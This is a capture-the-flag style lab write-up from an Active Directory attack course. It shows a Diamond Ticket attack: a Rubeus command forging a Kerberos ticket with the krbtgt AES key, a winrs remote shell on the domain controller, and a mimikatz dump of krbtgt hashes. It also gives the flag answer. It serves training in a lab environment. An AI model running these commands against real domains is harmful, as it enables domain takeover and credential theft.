Learning Object 10
Tasks
1 – Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack
Flag 19 [dcorp-dc] – Name of the account whose secrets are used for the Diamond Ticket attack 🚩
Solutions
1 – Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack
Run a new shell as administrator and use the following Rubeus command to execute the Diamond Ticket attack:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Using the newly spawned process started, access the DC using winrs:
winrs -r:dcorp-dc cmd
set username
.
c:\Users\student98>klist
Current LogonId is 0:0x15d03183
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/24/2025 4:38:27 (local)
End Time: 10/24/2025 14:36:05 (local)
Renew Time: 10/31/2025 4:36:05 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\Users\student98>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
set username
USERNAME=administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
C:\Users\Administrator>
.
Flag 19 [dcorp-dc] – Name of the account whose secrets are used for the Diamond Ticket attack 🚩
Krbtgt’s secrets are used for the Diamond Ticket attack.
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
-snip-
29 40b43724fa76e22b0d610d656fb49ddd
mimikatz(commandline) # exit
Bye!